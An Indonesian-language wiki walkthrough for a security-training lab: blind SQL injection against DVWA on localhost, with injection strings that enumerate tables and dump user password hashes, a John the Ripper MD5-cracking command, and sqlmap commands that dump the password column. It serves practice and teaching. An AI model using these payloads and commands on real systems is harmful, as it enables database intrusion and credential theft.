DVWA: SQLi blind
Revision as of 07:51, 4 March 2017 by Onnowpurbo (talk | contribs)
DVWA-BLIND SQL INJECTION : LOW Level
- Buka DVWA, misalnya http://localhost/DVWA-1.9
Username : Admin Password : Password
- Pilih SQL Injection BLIND dan dalam kolom ID masukan
1' and 1=1# 1' and 1=1 order by 2 # ID: 'or' 1=1--
Kita akan lihat ada 5 user
- Melihat informasi table
1' and 1=0 union select null,table_name from information_schema.tables# 1' and 1=0 union select null,table_name from information_schema.columns where table_name='users #
- Melihat informasi table name dari table user
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users #
- Terakhir lihat username dan password
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
- Crack md5 password
copy hasil password hash yang diperoleh, save misalnya dengan nama hash
Lakukan
root@bt:/pentest/passwords/john#./john --format=raw-md5 hash
Exploit DVWA menggunakan SQLmap
- Login ke DVWA
- Pilih DVWA Security Low
- Pada user ID tulis '1
- Jalankan addon tamer di browser
- Lakukan di terminal,
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
--> "security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="
di peroleh dari addon tamer di browser.
- lihat tables
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -D dvwa --tables
- lihat kolom di user tabel
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
- lihat field password & dump
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -C password --dump